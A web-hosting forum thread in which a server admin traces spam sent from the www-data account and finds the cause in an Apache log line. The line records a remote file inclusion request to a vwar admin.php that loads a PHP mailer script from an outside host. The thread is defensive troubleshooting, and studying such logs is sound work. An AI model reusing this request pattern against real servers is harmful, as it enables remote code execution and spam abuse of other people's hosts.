spam from my server from account www-data? Seems my server was listed on some spam filter sites.. I see al lot of messages in the mailq. all starting with www-data@..... how to prevend this, what is it??? thanks Raymond RayIT After some googling something like this should be in the vhost file to know which domain is giving the problem??? php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com" maybe for future updates of ISPCONFIG?? Are there other sollutions?? <b>Biggest problem is I can not find the website which has the bad script??!!!</b> example: May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<[email protected]>, size=4422, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<[email protected]>, size=4423, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<[email protected]>, size=4418, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<[email protected]>, size=4423, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<[email protected]>, size=4427, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<[email protected]>, size=4422, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<[email protected]>, size=4412, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<[email protected]>, size=4425, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<[email protected]>, size=4419, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<[email protected]>, size=4417, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<[email protected]>, size=4418, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<[email protected]>, size=4424, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<[email protected]>, size=4421, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<[email protected]>, size=4412, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<[email protected]>, size=4418, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<[email protected]>, size=4415, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<[email protected]>, size=4415, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<[email protected]>, size=4414, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<[email protected]>, size=4418, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<[email protected]>, size=4418, nrcpt=1 (queue active) May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...
help... can find nothing in the apache log files maybe have a look? http://www.rayit.com/syslog and http://www.rayit.com/ispconfig_access_log please have a look for me...
problem probably found www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200] "POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt? HTTP/1.1" 200 163464 "http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Seems to be the problem, I think.
I can only agree to Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the pike of the iceberg. The script seems to allow execution of external PHP code provided by an URL to the variable vwar_root.
thanks I chmod 000 the files and made user root hopefully if user will update to newest release problems will be fixed.. Will point the webmaster of the site to http://www.vwar.de/ various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar thanks Raymond RayIT
I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.
My access log file is empty. Is there someplace special where ISPConfig keeps the apache logs? I'm trying to identify which website might be causing the problem.